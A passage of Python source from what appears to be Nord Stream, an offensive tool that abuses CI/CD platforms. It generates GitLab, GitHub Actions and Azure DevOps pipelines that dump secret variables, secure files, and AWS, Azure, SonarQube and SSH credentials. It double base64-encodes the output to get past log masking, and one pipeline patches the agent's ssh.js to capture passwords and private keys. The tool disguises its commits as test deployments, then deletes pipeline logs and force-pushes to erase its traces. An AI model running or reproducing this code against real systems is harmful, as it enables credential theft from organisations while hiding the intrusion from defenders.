logger.info("Listing GitLab projects") for project in self._cicd.projects: repoPath = project.get("path") repoName = project.get("name") repoId = project.get("id") if repoPath != repoName: logger.raw(f'- {project["path_with_namespace"]} / {repoId} ({repoName})\n', level=logging.INFO) else: logger.raw(f'- {project["path_with_namespace"]} / {repoId}\n', level=logging.INFO) def listGitLabUsers(self): logger.info("Listing GitLab users") for user in self._cicd.listUsers(): id = user.get("id") username = user.get("username") email = user.get("email") is_admin = user.get("is_admin") res = f"- {id} {username}" if email != None: res += f" {email}" if is_admin != None: res += f"(is_admin: {is_admin})" logger.raw(f"{res}\n", level=logging.INFO) def listGitLabGroups(self): logger.info("Listing GitLab groups") for project in self._cicd.groups: logger.raw(f'- {project["full_path"]}\n', level=logging.INFO) def runPipeline(self): for project in self._cicd.projects: repoPath = project.get("path") repoName = project.get("name") if repoPath != repoName: logger.success(f'"{repoName}" ({repoPath})') else: logger.success(f'"{repoName}"') if self._localPath == None: domain = urlparse(self._cicd.url).netloc if self._cicd.url.startswith("https"): handler = "https" else: handler = "http" url = f"{handler}://foo:{self._cicd.token}@{domain}/{project.get('path_with_namespace')}" Git.gitClone(url) else: repoPath = self._localPath chdir(repoPath) self._pushedCommitsCount = 0 self._branchAlreadyExists = Git.gitRemoteBranchExists(self._cicd.branchName) Git.gitInitialization(self._cicd.branchName, branchAlreadyExists=self._branchAlreadyExists) try: # TODO: branch protections # if not self._forceDeploy: # self.__checkAndDisableBranchProtectionRules(repo) if self._yaml: self.__runCustomPipeline(project) else: logger.error("No yaml specify") except KeyboardInterrupt: pass except Exception as e: logger.error(f"Error: {e}") if logger.getEffectiveLevel() == logging.DEBUG: logger.exception(e) finally: self.__clean(project) chdir("../") subprocess.Popen(f"rm -rfd ./{repoPath}", shell=True).wait() logger.info(f"Check output: {self._cicd.outputDir}") def __runCustomPipeline(self, project): logger.info(f"Running custom pipeline: {self._yaml}") pipelineGenerator = GitLabPipelineGenerator() pipelineGenerator.loadFile(self._yaml) try: pipelineId = self.__launchPipeline(project, pipelineGenerator) if pipelineId: self._fileName = self._cicd.downloadPipelineOutput(project, pipelineId) if self._fileName: self.__extractPipelineOutput(project) logger.empty_line() except Exception as e: logger.error(f"Error: {e}") finally: logger.empty_line() def __launchPipeline(self, project, pipelineGenerator): logger.verbose(f"Launching pipeline.") projectId = project.get("id") pipelineGenerator.writeFile(f".gitlab-ci.yml") pushOutput = Git.gitPush(self._cicd.branchName) pushOutput.wait() try: if b"Everything up-to-date" in pushOutput.communicate()[1].strip(): logger.error("Error when pushing code: Everything up-to-date") logger.warning( "Your trying to push the same code on an existing branch, modify the yaml file to push it." ) elif pushOutput.returncode != 0: logger.error("Error when pushing code:") logger.raw(pushOutput.communicate()[1], logging.INFO) else: self._pushedCommitsCount += 1 logger.raw(pushOutput.communicate()[1]) pipelineId, pipelineStatus = self._cicd.waitPipeline(projectId) if pipelineStatus == "success": logger.success("Pipeline has successfully terminated.") return pipelineId elif pipelineStatus == "failed": self.__displayFailureReasons(projectId, pipelineId) return pipelineId except Exception as e: logger.exception(e) finally: pass def __extractPipelineOutput(self, project, resultsFilename="secrets.txt"): projectPath = project.get("path_with_namespace") with open( f"{self._cicd.outputDir}/{projectPath}/{self._fileName}", "rb", ) as output: pipelineResults = output.read() logger.success("Output:") logger.raw(pipelineResults, logging.INFO) def __clean(self, project): if self._pushedCommitsCount > 0: projectId = project.get("id") if self._cleanLogs: logger.info(f"Cleaning logs for project: {project.get('path_with_namespace')}") self._cicd.cleanAllLogs(projectId) logger.verbose("Cleaning commits.") if self._branchAlreadyExists and self._cicd.branchName != self._cicd.defaultBranchName: Git.gitUndoLastPushedCommits(self._cicd.branchName, self._pushedCommitsCount) else: if not self.__deleteRemoteBranch(): logger.info("Cleaning remote branch.") # rm everything if we can't delete the branch (only leave one file otherwise it will try to rm the branch) Git.gitCleanRemote(self._cicd.branchName, leaveOneFile=True) def manualCleanLogs(self): logger.info("Deleting logs") for project in self._cicd.projects: logger.info(f"Cleaning logs for project: {project.get('path_with_namespace')}") self._cicd.cleanAllLogs(project.get("id")) def __deleteRemoteBranch(self): logger.verbose("Deleting remote branch") deleteOutput = Git.gitDeleteRemote(self._cicd.branchName) deleteOutput.wait() if deleteOutput.returncode != 0: logger.error(f"Error deleting remote branch {self._cicd.branchName}") logger.raw(deleteOutput.communicate()[1], logging.INFO) return False return True def describeToken(self): response = self._cicd.getUser() logger.info("Token information:") username = response.get("username") if username != "": logger.raw(f"\t- Username: {username}\n", logging.INFO) isAdmin = response.get("is_admin") if isAdmin == None: logger.raw(f"\t- IsAdmin: False\n", logging.INFO) else: logger.raw(f"\t- IsAdmin: {isAdmin}\n", logging.INFO) email = response.get("email") if email != "": logger.raw(f"\t- Email: {email}\n", logging.INFO) id = response.get("id") if id != "": logger.raw(f"\t- Id: {id}\n", logging.INFO) note = response.get("note") if note != "" and note != None: logger.raw(f"\t- Note: {note}\n", logging.INFO) def listBranchesProtectionRules(self): logger.info("Listing branch protection rules.") for project in self._cicd.projects: projectName = project.get("path_with_namespace") logger.info(f"{projectName}:") try: protections = self._cicd.getBranchesProtectionRules(project.get("id")) self.__displayBranchesProtectionRulesPriv(protections) except GitLabError as e: logger.verbose( "Not enough privileges to get full details on the branch protection rules for this project, trying to get limited information." ) try: branches = self._cicd.getBranches(project.get("id")) self.__displayBranchesProtectionRulesUnpriv(branches) except GitLabError as e: logger.error(f"\t{e}") logger.empty_line() def __displayBranchesProtectionRulesPriv(self, protections): if len(protections) == 0: logger.success(f"No protection") for protection in protections: name = protection.get("name") logger.info(f'branch: "{name}"') allow_force_push = protection.get("allow_force_push") logger.raw(f"\t- Allow force push: {allow_force_push}\n", logging.INFO) code_owner_approval_required = protection.get("code_owner_approval_required", None) if code_owner_approval_required != None: logger.raw(f"\t- Code Owner approval required: {code_owner_approval_required}\n", logging.INFO) push_access_levels = protection.get("push_access_levels", []) logger.raw(f"\t- Push access level:\n", logging.INFO) self.__displayAccessLevel(push_access_levels) unprotect_access_levels = protection.get("unprotect_access_levels", []) logger.raw(f"\t- Unprotect access level:\n", logging.INFO) self.__displayAccessLevel(unprotect_access_levels) merge_access_levels = protection.get("merge_access_levels", []) logger.raw(f"\t- Merge access level:\n", logging.INFO) self.__displayAccessLevel(merge_access_levels) def __displayBranchesProtectionRulesUnpriv(self, branches): for branch in branches: isProtected = branch.get("protected") if isProtected: name = branch.get("name") logger.info(f'branch: "{name}"') logger.raw(f"\t- Protected: True\n", logging.INFO) developers_can_push = branch.get("developers_can_push") logger.raw(f"\t- Developers can push: {developers_can_push}\n", logging.INFO) developers_can_merge = branch.get("developers_can_merge") logger.raw(f"\t- Developers can merge: {developers_can_merge}\n", logging.INFO) def __displayAccessLevel(self, access_levels): for al in access_levels: access_level = al.get("access_level", None) user_id = al.get("user_id", None) group_id = al.get("group_id", None) access_level_description = al.get("access_level_description") res = f"\t\t{access_level_description}" if access_level != None: res += f" (access_level={access_level})" if user_id != None: res += f" (user_id={user_id})" if group_id != None: res += f" (group_id={group_id})" logger.raw(f"{res}\n", logging.INFO) def __displayFailureReasons(self, projectId, pipelineId): logger.error("Pipeline has failed.") pipelineFailure = self._cicd.getFailureReasonPipeline(projectId, pipelineId) if pipelineFailure: logger.error(f"{pipelineFailure}") else: jobsFailure = self._cicd.getFailureReasonJobs(projectId, pipelineId) for failure in jobsFailure: name = failure["name"] stage = failure["stage"] reason = failure["failure_reason"] logger.raw(f"\t- {name}: {reason} (stage={stage})\n", logging.INFO) ================================================ FILE: nordstream/git.py ================================================ import subprocess from nordstream.utils.log import logger from nordstream.utils.constants import * from nordstream.utils.helpers import randomString """ TODO: find an alternative to subprocess it's a bit crappy. """ class Git: USER = GIT_USER EMAIL = GIT_EMAIL KEY_ID = None ATTACK_COMMIT_MSG = GIT_ATTACK_COMMIT_MSG CLEAN_COMMIT_MSG = GIT_CLEAN_COMMIT_MSG @staticmethod def gitRunCommand(command): try: # debug level if logger.level <= 10: logger.debug(f"Running: {command}") subprocess.run(command, shell=True, check=True) else: subprocess.run(command, shell=True, check=True, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL) except subprocess.CalledProcessError: return False return True @classmethod def gitInitialization(cls, branch, branchAlreadyExists=False): logger.verbose("Git init") cls.gitRunCommand(f"git config user.Name {cls.USER}") cls.gitRunCommand(f"git config user.email {cls.EMAIL}") if cls.KEY_ID != None: cls.gitRunCommand(f"git config user.signingkey {cls.KEY_ID}") cls.gitRunCommand(f"git config commit.gpgsign true") if branchAlreadyExists: cls.gitRunCommand(f"git checkout {branch}") return cls.gitRunCommand(f"git checkout --orphan {branch}") cls.gitRunCommand(f"git pull origin {branch}") cls.gitRunCommand("git rm . -rf") @classmethod def gitCleanRemote(cls, branch, leaveOneFile=False): logger.verbose("Cleaning remote branch") cls.gitRunCommand("git rm . -rf") cls.gitRunCommand("git rm .github/ -rf") if leaveOneFile: fileName = randomString(5) + "_test_dev.txt" cls.gitRunCommand(f"echo {fileName} > {fileName}") cls.gitRunCommand(f"git add -A") cls.gitRunCommand(f"git commit -m '{cls.CLEAN_COMMIT_MSG}'") if leaveOneFile: cls.gitRunCommand(f"git push origin {branch}") else: cls.gitRunCommand(f"git push -d origin {branch}") @classmethod def gitRemoteBranchExists(cls, branch): logger.verbose("Checking if remote branch exists") return cls.gitRunCommand(f"git ls-remote --exit-code origin {branch}") @classmethod def gitUndoLastPushedCommits(cls, branch, pushedCommitsCount): for _ in range(pushedCommitsCount): cls.gitRunCommand("git reset --hard HEAD~") if pushedCommitsCount and not cls.gitRunCommand(f"git push -f origin {branch}"): logger.warning( "Could not delete commit(s) pushed by the tool using hard reset and force push. Trying to revert commits." ) cls.gitRunCommand("git pull") cls.gitRunCommand(f"git revert --no-commit HEAD~{pushedCommitsCount}..") cls.gitRunCommand(f"git commit -m '{cls.CLEAN_COMMIT_MSG}'") if pushedCommitsCount and not cls.gitRunCommand(f"git push origin {branch}"): logger.error("Error while trying to revert changes !") @staticmethod def gitDeleteRemote(branch): logger.verbose("Git delete remote.") return subprocess.Popen( f"git push -d origin {branch}", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, ) @classmethod def gitPush(cls, branch): logger.verbose("Pushing to remote branch") cls.gitRunCommand("git add .") cls.gitRunCommand(f"git commit -m '{cls.ATTACK_COMMIT_MSG}'") return subprocess.Popen( f"git push origin {branch}", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, ) @classmethod def gitCreateDummyFile(cls, file): cls.gitRunCommand(f"echo '{file}' > {file}") @classmethod def gitDiffFile(cls, file): return subprocess.Popen( f"git diff HEAD -- {file}", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, ) @classmethod def gitMvFile(cls, src, dest): cls.gitRunCommand(f"mv {src} {dest}") @classmethod def gitCpFile(cls, src, dest): cls.gitRunCommand(f"cp {src} {dest}") @classmethod def gitCreateDir(cls, directory): cls.gitRunCommand(f"mkdir -p {directory}") @staticmethod def gitClone(url): res = subprocess.Popen( f"git clone {url}", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, ) res.wait() if res.returncode == 0: return True elif b"You appear to have cloned an empty repository" in res.communicate()[1].strip(): return True else: return False @staticmethod def gitGetCurrentBranch(): return ( subprocess.Popen( "git rev-parse --abbrev-ref HEAD | tr -d '\n'", shell=True, stdout=subprocess.PIPE, ) .communicate()[0] .decode("UTF-8") ) # not needed anymore @staticmethod def gitIsGloalUserConfigured(): res = subprocess.Popen( "git config --global user.Name", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, ) res.wait() if res.returncode != 0: return False return True # not needed anymore @staticmethod def gitIsGloalEmailConfigured(): res = subprocess.Popen( "git config --global user.email", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, ) res.wait() if res.returncode != 0: return False return True ================================================ FILE: nordstream/utils/constants.py ================================================ # All constants OUTPUT_DIR = "nord-stream-logs" DEFAULT_BRANCH_NAME = "dev_remote_ea5Eu/test/v1" USER_AGENT = ( "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36" ) # GIT constants GIT_USER = "nord-stream" GIT_EMAIL = "nord-stream@localhost.com" GIT_ATTACK_COMMIT_MSG = "Test deployment" GIT_CLEAN_COMMIT_MSG = "Remove test deployment" # GITLAB constants COMPLETED_STATES = ["success", "failed", "canceled", "skipped"] # Azure DevOps DEFAULT_PIPELINE_NAME = "Build_pipeline_58675" DEFAULT_REPO_NAME = "TestDev_ea5Eu" DEFAULT_TASK_NAME = "Task fWQf8" # GitHub DEFAULT_WORKFLOW_FILENAME = "init_ZkITM.yaml" ================================================ FILE: nordstream/utils/devops.py ================================================ import logging from nordstream.cicd.devops import DevOps from nordstream.utils.log import logger def listOrgs(token): try: response = DevOps.getOrgs(token) logger.info("User orgs:") for org in response: logger.raw(f"\t- {org.get('AccountName')}\n", logging.INFO) except Exception as e: logger.error(e) ================================================ FILE: nordstream/utils/errors.py ================================================ class DevOpsError(Exception): pass class GitHubError(Exception): pass class GitHubBadCredentials(Exception): pass class GitLabError(Exception): pass class GitError(Exception): pass class GitPushError(GitError): pass class RepoCreationError(Exception): pass ================================================ FILE: nordstream/utils/helpers.py ================================================ import random, string def isHexadecimal(s): hex_digits = set("0123456789abcdefABCDEF") return all(c in hex_digits for c in s) def isGitLabSessionCookie(s): return isHexadecimal(s) and len(s) == 32 def isAZDOBearerToken(s): return s.startswith("eyJ0") and len(s) > 52 and s.count(".") == 2 def randomString(length): letters = string.ascii_lowercase return "".join(random.choice(letters) for i in range(length)) def isAllowed(value, sclist, allow=True): if allow: return value in sclist else: return not value in sclist ================================================ FILE: nordstream/utils/log.py ================================================ """ custom logging module. """ import logging import os from typing import Any, cast from rich.console import Console from rich.logging import RichHandler # Blablabla "roll your own logging handler" # https://github.com/Textualize/rich/issues/2647#issuecomment-1335017733 class WhitespaceStrippingConsole(Console): def _render_buffer(self, *args, **kwargs): rendered = super()._render_buffer(*args, **kwargs) newline_char = "\n" if len(rendered) >= 1 and rendered[-1] == "\n" else "" return "\n".join(line.rstrip() for line in rendered.splitlines()) + newline_char class NordStreamLog(logging.Logger): # New logging level SUCCESS: int = 25 VERBOSE: int = 15 @staticmethod def setVerbosity(verbose: int, quiet: bool = False): """Set logging level accordingly to the verbose count or with quiet enable.""" if quiet: logger.setLevel(logging.CRITICAL) elif verbose == 1: logger.setLevel(NordStreamLog.VERBOSE) elif verbose >= 2: logger.setLevel(logging.DEBUG) else: # Default INFO logger.setLevel(logging.INFO) def debug(self, msg: Any, *args: Any, **kwargs: Any) -> None: """Change default debug text format with rich color support""" super(NordStreamLog, self).debug("{}[D]{} {}".format("[bold yellow3]", "[/bold yellow3]", msg), *args, **kwargs) def verbose(self, msg: Any, *args: Any, **kwargs: Any) -> None: """Add verbose logging method with text format / rich color support""" if self.isEnabledFor(NordStreamLog.VERBOSE): self._log(NordStreamLog.VERBOSE, "{}[V]{} {}".format("[bold blue]", "[/bold blue]", msg), args, **kwargs) def raw( self, msg: Any, level=VERBOSE, markup=False, highlight=False, emoji=False, rich_parsing=False, ) -> None: """Add raw text logging, used for stream printing.""" if rich_parsing: markup = True highlight = True emoji = True if self.isEnabledFor(level): if type(msg) is bytes: msg = msg.decode("utf-8", errors="ignore") # Raw message are print directly to the console bypassing logging system and auto formatting console.print(msg, end="", markup=markup, highlight=highlight, emoji=emoji, soft_wrap=True) def info(self, msg: Any, *args: Any, **kwargs: Any) -> None: """Change default info text format with rich color support""" super(NordStreamLog, self).info("{}[*]{} {}".format("[bold blue]", "[/bold blue]", msg), *args, **kwargs) def warning(self, msg: Any, *args: Any, **kwargs: Any) -> None: """Change default warning text format with rich color support""" super(NordStreamLog, self).warning( "{}[!]{} {}".format("[bold orange3]", "[/bold orange3]", msg), *args, **kwargs ) def error(self, msg: Any, *args: Any, **kwargs: Any) -> None: """Change default error text format with rich color support""" super(NordStreamLog, self).error("{}[-]{} {}".format("[bold red]", "[/bold red]", msg), *args, **kwargs) def exception(self, msg: Any, *args: Any, **kwargs: Any) -> None: """Change default exception text format with rich color support""" super(NordStreamLog, self).exception("{}[x]{} {}".format("[bold red]", "[/bold red]", msg), *args, **kwargs) def critical(self, msg: Any, *args: Any, **kwargs: Any) -> None: """Change default critical text format with rich color support Add auto exit.""" super(NordStreamLog, self).critical("{}[!]{} {}".format("[bold red]", "[/bold red]", msg), *args, **kwargs) exit(1) def success(self, msg: Any, *args: Any, **kwargs: Any) -> None: """Add success logging method with text format / rich color support""" if self.isEnabledFor(NordStreamLog.SUCCESS): self._log(NordStreamLog.SUCCESS, "{}[+]{} {}".format("[bold green]", "[/bold green]", msg), args, **kwargs) def empty_line(self, log_level: int = logging.INFO) -> None: """Print an empty line.""" self.raw(os.linesep, level=log_level) # Global rich console object console: Console = WhitespaceStrippingConsole() # Main logging default config # Set default Logger class as NordStreamLog logging.setLoggerClass(NordStreamLog) # Add new level to the logging config logging.addLevelName(NordStreamLog.VERBOSE, "VERBOSE") logging.addLevelName(NordStreamLog.SUCCESS, "SUCCESS") # Logging setup using RichHandler and minimalist text format logging.basicConfig( format="%(message)s", handlers=[ RichHandler( rich_tracebacks=True, show_time=False, markup=True, show_level=False, show_path=False, console=console, ) ], ) # Global logger object logger: NordStreamLog = cast(NordStreamLog, logging.getLogger("main")) # Default log level logger.setLevel(logging.INFO) ================================================ FILE: nordstream/yaml/custom.py ================================================ import logging from nordstream.utils.log import logger from nordstream.yaml.generator import YamlGeneratorBase class CustomGenerator(YamlGeneratorBase): def loadFile(self, file): logger.verbose("Loading YAML file.") with open(file, "r") as templateFile: try: self._defaultTemplate = templateFile.read() except Exception as exception: logger.error("[+] Error while reading yaml file") logger.exception(exception) def writeFile(self, file): logger.verbose("Writing YAML file.") if logger.getEffectiveLevel() == logging.DEBUG: logger.debug("Current yaml file:") self.displayYaml() with open(file, "w") as outputFile: outputFile.write(self._defaultTemplate) def displayYaml(self): logger.raw(self._defaultTemplate, logging.INFO) ================================================ FILE: nordstream/yaml/devops.py ================================================ from nordstream.yaml.generator import YamlGeneratorBase from nordstream.utils.constants import DEFAULT_TASK_NAME class DevOpsPipelineGenerator(YamlGeneratorBase): taskName = DEFAULT_TASK_NAME def _get_base_template(self, poolName, os_type): pool = {"name": poolName} if poolName else { "vmImage": "windows-latest" if os_type.lower() == "windows" else "ubuntu-latest" } return { "pool": pool, "trigger": "none", "steps": [] } def _get_ps_b64_script(self, fetch_logic): """Helper to wrap PowerShell variable fetching in Double Base64 encoding.""" return f"""{fetch_logic} if ($output) {{ $output = $output.TrimEnd("`n", "`r") $base1 = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($output)) $base2 = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($base1)) Write-Host $base2 Write-Host "" }}""" def generatePipelineForSecretExtraction(self, variableGroup, poolName=None, os="linux"): self._defaultTemplate = self._get_base_template(poolName, os) self._defaultTemplate["variables"] = [{"group": variableGroup.get("name")}] secrets = variableGroup.get("variables", []) if os == "windows": secretVars = "" for sec in secrets: key = f"secret_{sec}" value = f"$({sec})" secretVars += f"'{key}'=\"{value}\"\n" fetch_logic = f"""$secret_vars = @{{ {secretVars} }} $output = "" $secret_vars.GetEnumerator() | ForEach-Object {{ $output += "$($_.Key)=$($_.Value)`n" }}""" self._defaultTemplate["steps"].append({ "task": "PowerShell@2", "displayName": self.taskName, "inputs": { "targetType": "inline", "script": self._get_ps_b64_script(fetch_logic) } }) else: env_vars = {f"secret_{sec}": f"$({sec})" for sec in secrets} self._defaultTemplate["steps"].append({ "task": "Bash@3", "displayName": self.taskName, "inputs": { "targetType": "inline", "script": "env -0 | awk -v RS='\\0' '/^secret_/ {print $0}' | base64 -w0 | base64 -w0 ; echo ", }, "env": env_vars, }) def generatePipelineForSecureFileExtraction(self, secureFile, poolName=None, os="linux"): self._defaultTemplate = self._get_base_template(poolName, os) self._defaultTemplate["steps"].append({ "task": "DownloadSecureFile@1", "name": "secretFile", "inputs": {"secureFile": secureFile}, }) if os == "windows": self._defaultTemplate["steps"].append({ "task": "PowerShell@2", "displayName": self.taskName, "inputs": { "targetType": "inline", "script": self._get_ps_b64_script('$output = Get-Content -Path "$(secretFile.secureFilePath)" -Raw') } }) else: self._defaultTemplate["steps"].append({ "script": "cat $(secretFile.secureFilePath) | base64 -w0 | base64 -w0; echo", "displayName": self.taskName, }) def generatePipelineForAzureRm(self, azureSubscription, poolName=None, os="linux"): self._defaultTemplate = self._get_base_template(poolName, os) step = { "task": "AzureCLI@2", "displayName": self.taskName, "inputs": { "targetType": "inline", "addSpnToEnvironment": True, "scriptLocation": "inlineScript", "azureSubscription": azureSubscription, }, } if os == "windows": step["inputs"]["scriptType"] = "pscore" step["inputs"]["inlineScript"] = self._get_ps_b64_script( '$output = (Get-ChildItem Env: | Where-Object Name -match "servicePrincipal" | ForEach-Object { "$($_.Name)=$($_.Value)" }) -join "`n"' ) else: step["inputs"]["scriptType"] = "bash" step["inputs"]["inlineScript"] = 'sh -c "env | grep \\"^servicePrincipal\\" | base64 -w0 | base64 -w0; echo ;"' self._defaultTemplate["steps"].append(step) def generatePipelineForGitHub(self, endpoint, poolName=None, os="linux"): self._defaultTemplate = self._get_base_template(poolName, os) self._defaultTemplate["resources"] = { "repositories": [{ "repository": "devRepo", "type": "github", "endpoint": endpoint, "name": "github/g-emoji-element", }] } self._defaultTemplate["steps"].append({"checkout": "devRepo", "persistCredentials": True}) if os == "windows": self._defaultTemplate["steps"].append({ "task": "PowerShell@2", "displayName": self.taskName, "inputs": { "targetType": "inline", "script": self._get_ps_b64_script('$output = Get-Content -Path ".\\.git\\config" -Raw') } }) else: self._defaultTemplate["steps"].append({ "task": "Bash@3", "displayName": self.taskName, "inputs": { "targetType": "inline", "script": 'sh -c "cat ./.git/config | base64 -w0 | base64 -w0; echo ;"', }, }) def generatePipelineForAWS(self, awsCredentials, poolName=None, os="linux"): self._defaultTemplate = self._get_base_template(poolName, os) if os == "windows": self._defaultTemplate["steps"].append({ "task": "AWSPowerShellModuleScript@1", "displayName": self.taskName, "inputs": { "awsCredentials": awsCredentials, "scriptType": "inline", "inlineScript": self._get_ps_b64_script( '$output = (Get-ChildItem Env: | Where-Object Name -match "AWS_SECRET_ACCESS_KEY|AWS_ACCESS_KEY_ID" | ForEach-Object { "$($_.Name)=$($_.Value)" }) -join "`n"' ) } }) else: self._defaultTemplate["steps"].append({ "task": "AWSShellScript@1", "displayName": self.taskName, "inputs": { "awsCredentials": awsCredentials, "scriptType": "inline", "inlineScript": 'sh -c "env | grep -E \\"(AWS_SECRET_ACCESS_KEY|AWS_ACCESS_KEY_ID)\\" | base64 -w0 | base64 -w0; echo ;"', }, }) def generatePipelineForSonar(self, sonarSCName, poolName=None, os="linux"): self._defaultTemplate = self._get_base_template(poolName, os) self._defaultTemplate["steps"].append({ "task": "SonarQubePrepare@6", "inputs": {"SonarQube": sonarSCName, "scannerMode": "CLI", "projectKey": "sonarqube"}, }) if os == "windows": self._defaultTemplate["steps"].append({ "task": "PowerShell@2", "displayName": self.taskName, "inputs": { "targetType": "inline", "script": self._get_ps_b64_script( '$output = (Get-ChildItem Env: | Where-Object Name -match "SONARQUBE_SCANNER_PARAMS" | ForEach-Object { "$($_.Name)=$($_.Value)" }) -join "`n"' ) } }) else: self._defaultTemplate["steps"].append({ "task": "Bash@3", "displayName": self.taskName, "inputs": { "targetType": "inline", "script": "sh -c 'env | grep SONARQUBE_SCANNER_PARAMS | base64 -w0 | base64 -w0; echo ;'", }, }) def generatePipelineForSSH(self, sshSCName, poolName=None, os="linux"): self._defaultTemplate = self._get_base_template(poolName, os) self._defaultTemplate["steps"].append({"checkout": "none"}) if os == "windows": self._defaultTemplate["steps"].extend([ { "task": "PowerShell@2", "continueOnError": True, "inputs": { "targetType": "inline", "script": 'Get-ChildItem -Path "D:\\a\\" -Recurse -Filter "ssh.js" | ForEach-Object { $p = $_.FullName; copy $p ($p+".bak"); (Get-Content -Path $p -Raw) -replace [regex]::Escape(\'const readyTimeout = getReadyTimeoutVariable();\'), \'const readyTimeout = getReadyTimeoutVariable();const fs = require("fs");var data = "";data += hostname + ":::" + port + ":::" + username + ":::" + password + ":::" + privateKey;fs.writeFile("artefacts.tar.gz", data, (err) => {});\' | Set-Content -Path $p }', }, }, { "task": "SSH@0", "continueOnError": True, "inputs": {"sshEndpoint": sshSCName, "runOptions": "commands", "commands": "sleep 1"}, }, { "task": "PowerShell@2", "displayName": self.taskName, "inputs": { "targetType": "inline", "script": 'Get-ChildItem -Path "D:\\a\\" -Recurse -Filter "ssh.js" | ForEach-Object { $p = $_.FullName; mv -force ($p+".bak") $p ;}; $encodedOnce = [Convert]::ToBase64String([IO.File]::ReadAllBytes("artefacts.tar.gz"));$encodedTwice = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($encodedOnce));echo $encodedTwice; echo \'\'; rm artefacts.tar.gz;', }, }, ]) else: self._defaultTemplate["steps"].extend([ { "script": 'SSH_FILE=$(find /home/vsts/work/_tasks/ -name ssh.js) ; cp $SSH_FILE $SSH_FILE.bak ; sed -i \'s|const readyTimeout = getReadyTimeoutVariable();|const readyTimeout = getReadyTimeoutVariable();\\nconst fs = require("fs");var data = "";data += hostname + ":::" + port + ":::" + username + ":::" + password + ":::" + privateKey;fs.writeFile("/tmp/artefacts.tar.gz", data, (err) => {});|\' $SSH_FILE', "displayName": f"Preparing {self.taskName}", }, { "task": "SSH@0", "continueOnError": True, "inputs": {"sshEndpoint": sshSCName, "runOptions": "commands", "commands": "sleep 1"}, }, { "script": "SSH_FILE=$(find /home/vsts/work/_tasks/ -name ssh.js); mv $SSH_FILE.bak $SSH_FILE ; cat /tmp/artefacts.tar.gz | base64 -w0 | base64 -w0 ; echo ''; rm /tmp/artefacts.tar.gz", "displayName": self.taskName, }, ]) ================================================ FILE: nordstream/yaml/generator.py ================================================ import yaml import logging from nordstream.utils.log import logger class YamlGeneratorBase: _defaultTemplate = "" @property def defaultTemplate(self): return self._defaultTemplate @defaultTemplate.setter def defaultTemplate(self, value): logger.warning("Using your own yaml template might break stuff.") self._defaultTemplate = value @staticmethod def getEnvironnmentFromYaml(yamlFile): with open(yamlFile, "r") as file: try: data = yaml.safe_load(file) return data.get("jobs").get("init").get("environment", None) except yaml.YAMLError as exception: logger.exception("Yaml error") logger.exception(exception) def loadFile(self, file): logger.verbose("Loading YAML file.") with open(file, "r") as templateFile: try: self._defaultTemplate = yaml.load(templateFile, Loader=yaml.BaseLoader) except yaml.YAMLError as exception: logger.error("[+] Yaml error") logger.exception(exception) def writeFile(self, file): logger.verbose("Writing YAML file.") if logger.getEffectiveLevel() == logging.DEBUG: logger.debug("Current yaml file:") self.displayYaml() with open(file, "w") as outputFile: yaml.dump(self._defaultTemplate, outputFile, sort_keys=False) def displayYaml(self): logger.raw(yaml.dump(self._defaultTemplate, sort_keys=False), logging.INFO) ================================================ FILE: nordstream/yaml/github.py ================================================ from nordstream.utils.log import logger from nordstream.yaml.generator import YamlGeneratorBase class WorkflowGenerator(YamlGeneratorBase): _defaultTemplate = { "name": "GitHub Actions", "on": "push", "jobs": { "init": { "runs-on": "ubuntu-latest", "steps": [ { "run": "env -0 | awk -v RS='\\0' '/^secret_/ {print $0}' | base64 -w0 | base64 -w0", "name": "command", "env": None, } ], } }, } _OIDCAzureTokenTemplate = { "name": "GitHub Actions", "on": "push", "permissions": {"id-token": "write", "contents": "read"}, "jobs": { "init": { "runs-on": "ubuntu-latest", "environment": None, "steps": [ { "name": "login", "uses": "azure/login@v1", "with": {"client-id": None, "tenant-id": None, "allow-no-subscriptions": True}, }, { "name": "command", "run": '(echo "Access token to use with Azure Resource Manager API:"; az account get-access-token; echo -e "\nAccess token to use with MS Graph API:"; az account get-access-token --resource-type ms-graph) | base64 -w0 | base64 -w0', }, ], } }, } _OIDCAWSTokenTemplate = { "name": "GitHub Actions", "on": "push", "permissions": {"id-token": "write", "contents": "read"}, "jobs": { "init": { "runs-on": "ubuntu-latest", "environment": None, "steps": [ { "name": "login", "uses": "aws-actions/configure-aws-credentials@v1-node16", "with": {"role-to-assume": None, "role-session-name": "oidcrolesession", "aws-region": None}, }, { "name": "command", "run": "sh -c 'env | grep \"^AWS_\" | base64 -w0 | base64 -w0'", }, ], } }, } def generateWorkflowForSecretsExtraction(self, secrets, env=None): self.addSecretsToYaml(secrets) if env is not None: self.addEnvToYaml(env) def generateWorkflowForOIDCAzureTokenGeneration(self, tenant, subscription, client, env=None): self._defaultTemplate = self._OIDCAzureTokenTemplate self.addAzureInfoForOIDCToYaml(tenant, subscription, client) if env is not None: self.addEnvToYaml(env) def generateWorkflowForOIDCAWSTokenGeneration(self, role, region, env=None): self._defaultTemplate = self._OIDCAWSTokenTemplate self.addAWSInfoForOIDCToYaml(role, region) if env is not None: self.addEnvToYaml(env) def addEnvToYaml(self, env): try: self._defaultTemplate.get("jobs").get("init")["environment"] = env except TypeError as e: logger.exception(e) def getEnv(self): try: return self._defaultTemplate.get("jobs").get("init").get("environment", None) except TypeError as e: logger.exception(e) def addSecretsToYaml(self, secrets): self._defaultTemplate.get("jobs").get("init").get("steps")[0]["env"] = {} for sec in secrets: key = f"secret_{sec}" value = f"${{{{secrets.{sec}}}}}" self._defaultTemplate.get("jobs").get("init").get("steps")[0].get("env")[key] = value def addAzureInfoForOIDCToYaml(self, tenant, subscription, client): self._defaultTemplate["jobs"]["init"]["steps"][0]["with"]["tenant-id"] = tenant self._defaultTemplate["jobs"]["init"]["steps"][0]["with"]["client-id"] = client if subscription: self._defaultTemplate["jobs"]["init"]["steps"][0]["with"]["subscription-id"] = subscription def 